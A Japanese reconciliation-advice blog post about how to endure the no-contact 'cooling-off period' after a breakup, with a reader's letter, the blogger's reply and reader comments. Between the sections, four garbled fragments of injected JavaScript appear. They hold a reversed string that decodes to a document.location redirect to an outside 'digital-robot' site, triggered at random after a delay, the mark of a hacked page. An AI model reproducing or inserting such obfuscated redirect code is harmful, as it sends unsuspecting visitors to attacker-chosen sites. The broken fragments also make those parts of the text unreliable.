【復縁冷却期間】元カノ元彼に連絡が取りたい誕生日や心配メールは?

この記事は4分で読めます

こんにちは、復縁ドッグです。

<(´・д・`)ノよろしくぅ~!

私は現在、復縁に成功し、結婚を果たしました。

地獄からの生還!復縁ドッグの復縁成功談

 

このページでは、復縁ドッグのもとに寄せられた、

復縁に関する、相談メールと、その回答を掲載しています。

復縁希望の方、あなたの悩みは、あなただけの悩みではなりません。

みな、同じ悩みを抱えているのです。

 

このページを読んで、少しでもあなたの気持ちが楽になり、

前を向ければ幸いです。

(っ`・ω・´)っフレーフレー!!!

では、早速見ていきましょう。

 

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 1px solid #333333; background-color: #e6eae6;”>

今回は、復縁ドッグの “冷却期間の過ごし方”に関する質問ですね。フムフム(*゚Д゚)φ))ナルホド!!

冷却期間の関する質問は、本当に多く頂きます。

では、どのように冷却期間を過ごしていけばいいのでしょうか?

その1つの役割を、実際にメールを見ながら、解説していきます。

※個人が特定される部分はカットさせていただいております。

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 3px solid #38b48b;”>

【質問】

復縁ドッグ様

 

ご無沙汰しております。

久しぶりにメールをいたします。

 

以前のアドバイスを頂いたとおり、

今は冷却期間をおいて、日々7STEPをコツコツと進めております。

また7STEPのサポートからもやはり冷却期間を

2~3ヶ月はとった方がよいとアドバイスを頂きました。

 

今はまだ冷却期間にはいり数週間ですが、

毎日彼女のことを考えては悶々としてしまいます。

つい携帯に手が伸びて連絡をしようとしてしまいます。

 

まだあと数ヶ月この状態を続けていけるのか、

正直不安でなりません。

 

復縁ドッグ様はどのようにこういった事態を乗り切ったのでしょうか?

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 3px solid #e9546b;”>

【回答】

こんばんは、

復縁ドッグです。

 

そうですね・・・。

私の場合は、冷却期間といった概念がなかったので、

ただ単に、がむしゃらに復縁を迫っていただけなんです。

 

7stepはもちろん、復縁マニュアルなんて

ありませんでしたから。

 

ですが、自分でこれ以上メールは送っちゃいけないと、

封印したことはあります。

そのときは、とにかく耐えていましたね。

友達と会っていたりと、なるべくメールをしづらい環境を作るように

心がけていました。

 

(中略)

 

でもやっぱり最後には、意志の力だと思います。

冷却期間は必要なんです。

それは、確実なことなんですよ。

 

当時の私のように、何の情報もない訳でもなく、

共に、復縁を目指す仲間もいますし、みなが頑張っているメールを読んで、

踏ん張っていきましょう。

 

みな、同じような状況の中、踏ん張っている訳ですからね。

変化のない状況で、アプローチしてしまうことは、

自分で自分の首を締めるだけなんです。

だから、ここは、踏んりどころですよ。

 

復縁ドッグ

 

 

冷却期間中、連絡を取りたいけど、取れないと

苦しんでいる人は、本当に多いです。

 

冷却期間中は、今まで付き合っていた時のようなメールが、一切なくなります。

毎日の日課だったようなメールがなくなると、その寂しさから、

ついつい連絡をしてしまって、自爆する人が多いのが、現状です。

ウルァッ(((((;`Д´)≡⊃)`Д)、;’.・

 

でも、そんな時は、思い出して欲しいのです。

なぜ、彼、彼女は、あなたとの別れを決断したのか?

 

付き合いが良好だった時期は、あなたのことが好きだったんです。

だから、付き合っていた訳ですし、一緒にいたんです。

でも、それを止めた。

 

彼、彼女だって、あなたのことが好きなままだったら、

付き合っていたかったんです。

今まで付き合って来た思い出もありますし、情だってあります。

できれば、この先、ずーーと、一緒にいたかった。

にも関わらず、別れを決断したんです。

言い方を変えると、別れを決断せざるを得なかったんです。

 

それは、なぜか?

 

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 10px; border: 1px solid #460e44; background-color: #ffffef;”>

付き合っていけない、理由があったからです。

別れを決断するほどの理由があったんです。

その理由が、あなたと彼、彼女との心の距離を生み出してしまったのです。

 

 

分かりますか?

この心の距離を埋めるには、連絡をすることではないんです。

電話して、メールして、自分の気持ちを彼、彼女に伝えれば、

気持が変わってくれるとか、そういった問題ではないのです。

 

問題は、別れの理由を改善すること。

それを見つけ出すこと。

これが、復縁を成功に導くためには、必須条件なんです。

 

 

冷却期間中は、ほんとーーーーに、色々なことをやらなくてはいけません。

本当の別れの原因を探し出すことも、その1つです。

冷却期間は、連絡を取らない期間ではありません。

自分を変える期間なのです。

ヾ(゚Д゚ )チョット、オクサン!

 

復縁活動で、一番やってはいけないことは、

自分の感情がコントロールできずに、その感情を相手のことも

考えないで、ぶつけてしまうことです。

 

だから、感情コントロールをマスターすることも、冷却期間中に

出来るようにならなくてはいけないことです。

別れ際に、大半の人が、感情を暴走させてしまって、

復縁までの、期間を、自分で伸ばしてしまっているんです。

 

にもかかわらず、別れた後ですら、同じ行為を繰り返してしまう…。

そして、自分で復縁を遠ざけていくのです。

当時も、そうでした…。

。・゚(゚⊃ω⊂゚)゚・。エーンエーン

 

そして、いつの間にか、連絡が取れなくなり、絶望するのです。

ガ━━━━∑(゚□゚*川━━━━━ン!

 

 

そうならない為にも、まずは、連絡ではなく、自分を変えること。

これが、冷却期間の基本中の、基本なのです。

 

誕生日や心配メールなどを送ったらいいのか?

迷うと思いますが、別れ方や相手が警戒しているかどうかにもよって大きく変わってきます。

そのあたりの判断は、恋愛レベルに依存していますし、相手を理解できているかどうか?

その深さにもよるんです。

 

冷却期間に、やらなくてはいけないことを、すべて、

このページに書き出したら、莫大な量になってしまいますので、

この辺にしておきますが、その他、冷却期間中に、復縁希望者さんが

心配になる代表例と、その解決策を、別ページに載せてありますので、

心配な方は、参考にしてみてくださいね。

 

復縁ドッグ

 

この記事を読んでいる人は以下のカテゴリー記事も読んでいます。

復縁ドッグスカイプセミナー
復縁ドッグによる復縁基礎講座
復縁結婚カップル対談
復縁活動中の方からの疑問を解決
復縁成功報告メール

  • このエントリーをはてなブックマークに追加

関連記事

コメント

    • じゅん

    たくさんコメントすみません。冷却期間中、メールはしなくともTwitter等のSNSで絡んでしまうのもまずいのでしょうか。

      • 復縁ドッグ

      メールもツイッターも同じことです。
      連絡を取る手段が違うだけですからね。
      フォーカスは自分。
      連絡を取ることではないんです。
      どういった自分になるべきか?
      変わる前に会っても、結果は同じです。
      変化が先、アプローチはその後。
      この順番は間違ってはいけないと思います。

    • のじこ

    埼玉在住の女子大生です。
    元彼は大学の先輩でしたが、1ヶ月前に別れてしまいました。
    冷却期間を置こうと思いましたが、元彼は4月から社会人になり、山口県に行ってしまいます。もともと私は埼玉、元彼は千葉でそこそこ遠距離でしたがさらに離れてしまいます。冷却期間はどのように取るべきなのでしょうか。ちなみに別れた時は悲しくて泣いてしまいましたが、彼を責めたり、無理に引き止めたりはしませんでした。復縁のことも考えてこの1ヶ月間は連絡も取らないようにしていました。

    • A・N・Z

    自分も同じ状況です。

    失われた「何か」を取り戻す、冷却期間は絶望ではなく逆に絶好のチャンスだと思います。
    自分にとって学ぶべきことも多いので。

    • りょう

    6月に、振られた彼氏から今日台風大丈夫の心配ラインが来ました。それまで1度も連絡もこちらかはしていません。
    大丈夫か気になってと言う内容でした。
    大丈夫だよという内容を、送るとあっさり
    わかった!じゃあバイバイと、言われました。
    意味があったのでしょうか?
    単純に心配してくれたのでしょうか?

  1. この記事へのトラックバックはありません。

管理人:復縁ドッグ


恋愛レベルの向上なしに復縁はできない!

恋愛レベルの向上なしに夫婦の絆は作れない!

をモットーに、当サイトは運営されています。


1年2ヵ月の歳月を費やし、

自力で復縁に成功した復縁ドッグは

現在、復縁した彼女と結婚し

幸せな家庭を築いています。



→復縁ドッグによる前10回復縁メール講座



→復縁ドッグの10年以上に渡る復縁日記



→復縁に欠かせない基礎知識


youtube動画一覧

復縁オンライン講座